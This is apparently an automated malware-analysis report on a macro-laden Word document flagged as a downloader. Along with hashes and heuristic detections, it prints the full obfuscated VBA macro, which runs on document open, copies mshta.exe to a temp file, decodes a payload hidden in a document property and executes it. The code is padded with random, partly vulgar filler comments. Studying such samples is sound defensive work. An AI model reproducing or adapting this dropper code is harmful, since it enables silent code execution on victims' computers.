Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0cf18dc6d8cd11dc…

MALICIOUS

Office (OOXML)

Size: 100.4 KB
Created: 2020-11-18 20:26:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-11-23
MD5: f96d0e085a0648335a844e1cdd31ed6f
SHA-1: 3a2c533d5ba0b9ddb3d38912ba2118569f8ccd35
SHA-256: 0cf18dc6d8cd11dca29694ea98c204321d8d662d3ffefc01f2a96c63f6d1bc53
Risk score: 138

Heuristics (6)

  • ClamAV: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Call CreateObject("ws" + aN6Dch + "ell").run(aDnOY)
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    a8Vdg = Environ(aINnkh)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/ink | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3d | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cid | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape | In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/ | In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# | In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/ | In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# | In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/ | In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/ | In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 10489 bytes
SHA-256: 17504fa1151c1baa4afac567190893866fbe64f6f66b991fa6cac2deb0a5df26
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "axBLuD"
Sub AutoOpen()
' Retrace accountable slime
' Cheese mediate lice
' Se determines fudge hampton
' Bristling over amp
' Pipes parsonage spot disagreement
' Payment pervert whove feasible
' Isolated pantheon
' Mainstream intermittent encyclopedia
' Oddity accumulates captivate hurling
' Ungainly autem virgin
' Cession uncultivated
aWJPFB
End Sub

Attribute VB_Name = "aeTqcS"
Public Const a8WFp As String = ""
Public Const alt40 As Integer = 293 - 280
Public Const a61Cnv As String = "1ridn1iw1"
Public Const akzHB As String = "231met1sys1"
Public Const aZutCY As String = "p1m1e1t"
Public Const aN6Dch As String = "cript.sh"
Function adK0Ve()
' Enact hu worked tang baltimore
' Andale soot serpentine criminal lobe
' Bacon record
' Voicing norwegian identity xbox defunct
' Inviolable egotism reciprocate
' Armature passed florida
' Compiler displayed absolution checkered being
' Ballast catacombs mythological
' Supported dana uruguay alleviate
' Abbreviations adder
' Mario passageway grannie
End Function
Sub asOfhu(aadYV3)
' Portray desk layout loot
' Provincial elseif indicating smack
' Sending liquid assassins ada
' Overwhelm giraffe webster keel
' Metre aol nightingale nb
' Cnet integrating fran portentous
' Gnu mail hexameter crease humanity
' Citizenship penniless vascular
' Minerva en public freeze
' Turns chemicals refutation
' Curve pecking niggard works arising blond
' Hd calculated omnipotence possibilities larvae bray kay
' Farms capitol promise oratorical chilling
' Freehold incipient computing
' Stayed morass
' Ark. bristol prays sussex these cents
' Terrifying siena beginning congo soundtrack
' Component typhus impetus capitol
' Absolutely commitment terminology
' Sprightly
' Reasons transcript
' None improvements resume rhapsody cork alder
' Mind managed savage rankings
' Clocks terror
' Mongolian intrusive clinical pulsation
' Exact richards adelaide
' Bloodshot ointment
' Eradicate amanda baltimore closeted unco walls
' Clover swagger token comma pd
' Ventral nitrogen one-sided
' Decade desk public
' Tub cut sd thimble modification reserves y
' Epirus syrup jer. chick
' Windpipe kerry sacerdotal ourselves bestowal
' Gape consultation
' Stubbornly bacteria astrologer
' Cuirass disquisition transgression worry
' Vermin org undeveloped drives lottery
' Engineering consulate antibody ci high-pitched pillage prefer
' Vascular significant
' Spectacular fervour husband
' Hiring winsome coax unproductive armenia mammon
' Bacterial
' Rhapsody forge manufacture
' Padua representations atrocity
' Froth
' Teacup
End Sub
Function a137av(aTOuxa)
a137av = ActiveDocument.BuiltInDocumentProperties(aTOuxa)
End Function
Public Sub aCI4wU()
a4nQD
End Sub
Public Sub aQjunc()
' Likelihood africa popish noontide
' Swingers ii bleached sept coupon
' Hollywood tires bed cobweb controls lexicon winning
' Tion
' Malleable nearly therapy
' Prediction dairy
' Ducal phd laboratories
' Air
' Cancel const updating peppermint
' Gary modeling
' Briefing impertinence liability marketplace
aNQo3k
End Sub

Attribute VB_Name = "ahgEL"
Public Function aY2RNu(am6Twu, a9bHsy)
' Aircraft kangaroo dormitory leant burning
' Collation cruiser bob autograph propecia quiz nativity
' Petersburg abelard ata
' Lunar liberal gbp buddy chary
' Spa manually leave-taking formality postman
' Marijuana percent northern
' Food pump gratuity
' Crap niger volume milfhunter ion south
' Confidential oratorio
' Crags innovative blind fetish uc bite
' Yugoslavia insular
' October olfactory decor gloucestershire juniper
' Pct unification wr rrp significantly
' Reproductive frieze assistance
' Customers thread
' Detection euphrates leant
' Ordain skip wheel partial telephony
' Pusillanimous whiles prologue tuner
' Semi swing charts flaunt
' Cold haired screenshots regulatory equilibrium wanted
' Aide
' Waters voyeurweb charger
' Performance unto falsify ak canning priest
' Doll toilet all-embracing mf
' Surmise implementing queue bivouac oughtnt inquiry
' Ferry hughes lukewarm
' 12mo transgress ways
' Pussy fbi
' Pickled hip
' Swineherd ea
' Saw momentum celebs
' Porridge
' Homeless epidemic
' Iso lessons consoles buckle lifelike
' Vial euripides
FileNumber = FreeFile
Open am6Twu For Output As #FileNumber
' Need scott kinship
' Blink favor
' Fred
' Nashville relentlessly
' Textbook currently wood
' Screech leafy
' Individuals affect fuse unfounded
' Davidson
' Changing whet downtown periodically
' Threatening sewed
' Snipe lycos
Print #FileNumber, a9bHsy
Close #FileNumber
End Function
Sub ai1FxW(a3kVR, aTdYjg)
' Wills replica welch candelabra handicraft hughes
' Rogers specialist normans baggy unconcern
' Balustrade
' Readers roseate withers
' Dylan
' Accepts mulatto bret decrease frees
' Rubble voters pest
' Participated unopened ferrara highland
' Tapes hr mulberry parents lifelike
' Advisor
' Monitor thrush synthetic cheats
' Frisky enigma
' Chronicle regulation bali
' Turnkey scroll
' Gang alaric chancellor brilliant
' Guestbook life-size
' Faced instructors
' Emergency harbour arid dev
' Resistant sot might composed
' Lightweight vegetables railway businesslike mirrors token
' Lumbering gp
' Salvation agonized manger donors
' Exhibits slit realist agricultural
' Crayon begrudge epic
' Co-operative subjugate
FileCopy a3kVR, aTdYjg
End Sub
Function agQk0(anJm0)
agQk0 = anJm0
End Function
Function aWxDq(anJm0) As String
Dim aFNpnP As Long
Dim a41Da As Integer
Dim acODG As Integer
For aFNpnP = 1 To Len(anJm0)
' Bulb ably
' Undefined cc
' Unattended propagate mess
' Architects magically regulation usable expence
' Self-evident adopt mirror
' Moderator affecting
' Belkin stream rice
' Fair saskatchewan
' Stacy swineherd spat
' Olympus visit nazareth
acODG = 0
aZ64u = Mid(anJm0, aFNpnP, 1)
a41Da = Asc(aZ64u)
If (a41Da > akNpz(32468 - 32467) And a41Da < akNpz(4947 - 4945)) Or (a41Da > akNpz(7641 - 7638) And a41Da < akNpz(26816 / 6704)) Then
acODG = alt40
' Elevation lees
a41Da = aNdq0H(a41Da, acODG)
' Filled monotone transmutation brusque warrant
If a41Da < akNpz(5) And a41Da > 83 Then
a41Da = acZYEa(a41Da)
ElseIf a41Da < 14755 / 227 Then
a41Da = acZYEa(a41Da)
End If
End If
' Forgotten amassed guitar yard
ab8eWz = aBZIx(a41Da)
Mid$(anJm0, aFNpnP, 1) = agQk0(ab8eWz)
Next aFNpnP
aWxDq = anJm0
End Function

Attribute VB_Name = "auvlR6"
Function aw6BS3(aC1Ls)
abNaA = aC1Ls
a9DeW2 = Len(abNaA)
For aJf41 = 0 To a9DeW2 - 1
aHwBet = aHwBet & Mid(abNaA, (a9DeW2 - aJf41), 1)
Next aJf41
aw6BS3 = aHwBet
End Function
Public Function aW7Ne(aCUQKv)
aW7Ne = Replace(aCUQKv, a8WFp, "")
' Please
' Consist chastity guardian effect
' Repeat wane arc easier egotism
' Cuisine birthplace dell
' Recipients
' Manufactured carrying lyre abstractedly
' Remoteness
' Smell economies
' Abdication woodwork stand layman
' Excellent ariel
End Function
Sub aWJPFB()
' Junk becomes ugliness chisel za
aCI4wU
aQjunc
' Ambiguous bookish unbending concierge
' Elections religion save nutrition
' Halves appraisal uterus melbourne
' Associates amazon
' Avoiding mods knitting
' Mandolin hoarding melodious
' Specification ware
' Deadly spoor
' York drop atlas
' Travesti
' Tyrone oceans flakes restorer
' Dweller consolidation
Call CreateObject("ws" + aN6Dch + "ell").run(aDnOY)
End Sub

Attribute VB_Name = "arYJVh"
Function a8Vdg(aINnkh)
a8Vdg = Environ(aINnkh)
End Function
Function ajN37T()
With Application
ajN37T = .PathSeparator
End With
End Function
Function aVBbg(aYmIng)
aDGmA3 = VBA.Split(aw6BS3("lmth.ni|moc.ni|exe.athsm"), "|")
' Hog incest
' Abridged bridget lite
' Box integral asin solving
' Tawdry equivalent
' Spurn original excel gravity wanted vineyard
' Shortening aromatic palestinian splinter
' Buys comparisons benefice onset trends
' Fernando ostensible
' Inside quaking blues
' Mauritius buyer correlation prizes
' Mach holly tumultuously bulbous affair
' Ebay com- subsides harangue
' Londoner
' Pk
' Dispatched focus refinance
Select Case aYmIng
Case 0:
' Bryant turner
aVBbg = a8Vdg(Replace(aw6BS3(a61Cnv), "1", "")) & ajN37T & Replace(aw6BS3(akzHB), "1", "") & ajN37T & aDGmA3(0)
' Botany
' Alabama phalanx seller
' Grieves pace bikes
' Folklore apache bodice gays
' Loans curative seek
' Span seventy-three
' Ps. ages min cockade jeopardy
' Sportsman qualities announcements ratio bonfire
' Fake pda knight room
' Fear fibre
' Fiction sept curious
' Ag insides case carey annex labor combination
Case 1:
aVBbg = a8Vdg(Replace(aw6BS3(aZutCY), "1", "")) & ajN37T & aDGmA3(1)
' Veined verification recede mar inexpensive
' Touring gauge
' Boulevard standard scenario
' Overbearing
' Leave-taking ranking illness
' Glue
' Arkansas collectors
' Smith jewelry grimace
' Widespread frequently
' Fisting
' Studio global
Case 2:
aVBbg = a8Vdg(Replace(aw6BS3(aZutCY), "1", "")) & ajN37T & aDGmA3(2)
End Select
End Function
Sub aNQo3k()
aNP1y = adflNG(aVBbg(2))
aY2RNu aNP1y, aWxDq(a137av("category"))
End Sub

Attribute VB_Name = "agCvA"
Function aS8xz(aEhtb)
aS8xz = (aW7Ne(aEhtb))
End Function
Function aNCrbw(aav7nk)
aNCrbw = (aW7Ne(aav7nk))
End Function
Function adflNG(ayPvn)
adflNG = (aW7Ne(ayPvn))
End Function
Function aDnOY()
aiyIv5 = aNCrbw(aVBbg(1))
aJqp2 = adflNG(aVBbg(2))
aDnOY = aiyIv5 & " " & aJqp2
End Function

Attribute VB_Name = "a8WXbP"
Sub a4nQD()
aEYANf = aS8xz(aVBbg(0))
afjRD = aNCrbw(aVBbg(1))
ai1FxW aEYANf, afjRD
End Sub
Function acZYEa(aaGAI)
acZYEa = aaGAI + 9776 / 376
End Function
Function akNpz(amKVCB)
If amKVCB = 0 Then
akNpz = 8025 / 8025
ElseIf amKVCB = 1 Then
akNpz = 524 - 460
ElseIf amKVCB = 2 Then
akNpz = -33 + 124
ElseIf amKVCB = 3 Then
akNpz = 26496 / 276
ElseIf amKVCB = 4 Then
akNpz = 45 + 78
ElseIf amKVCB = 5 Then
akNpz = 11349 / 117
Else
akNpz = 996 + 28
End If
End Function
Function aNdq0H(aaGAI, aNZhCQ)
aNdq0H = aaGAI - aNZhCQ
End Function
Function aBZIx(aaGAI)
aBZIx = VBA.ChrW(aaGAI)
End Function
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 46592 bytes
SHA-256: 405ba01918a03888f7d6fc79813815b4be98db0963b827143d74f743b4a31c3a